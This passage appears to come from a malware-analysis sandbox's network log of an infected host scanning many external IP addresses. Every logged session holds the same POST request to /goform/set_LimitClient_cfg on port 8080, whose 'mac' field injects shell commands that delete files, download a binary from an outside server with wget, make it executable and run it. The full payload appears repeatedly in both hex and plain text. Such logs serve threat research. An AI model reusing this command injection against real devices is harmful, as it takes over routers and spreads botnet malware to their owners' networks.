                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1612192.168.2.234215466.15.125.1538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.387784004 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1613192.168.2.2355752185.113.47.1268080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.387810946 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1614192.168.2.234750812.238.141.28080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.387833118 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1615192.168.2.2353984124.33.17.1478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.387851954 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1616192.168.2.234019614.47.76.2198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414355993 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1617192.168.2.234555052.226.121.1258080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414407969 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1618192.168.2.235284499.151.136.1848080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414474010 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1619192.168.2.235888684.216.112.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414475918 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1620192.168.2.233550079.71.50.588080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414486885 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1621192.168.2.2356644109.43.71.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414486885 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1622192.168.2.2343348142.7.157.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414486885 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1623192.168.2.2358590196.157.157.298080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414500952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1624192.168.2.2334416196.123.254.1628080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414529085 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1625192.168.2.2333064210.212.227.1378080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414534092 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1626192.168.2.233412678.92.243.1808080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414551020 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1627192.168.2.233334683.106.247.1798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414560080 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1628192.168.2.2359532164.20.0.858080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414598942 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1629192.168.2.235224877.21.107.2068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414618015 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1630192.168.2.2351482184.183.16.958080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414660931 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1631192.168.2.23441325.23.45.1398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.414673090 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1632192.168.2.2336874113.139.169.2458080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415093899 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1633192.168.2.235388284.218.122.1068080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415144920 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1634192.168.2.233712279.192.247.388080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:11.415159941 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
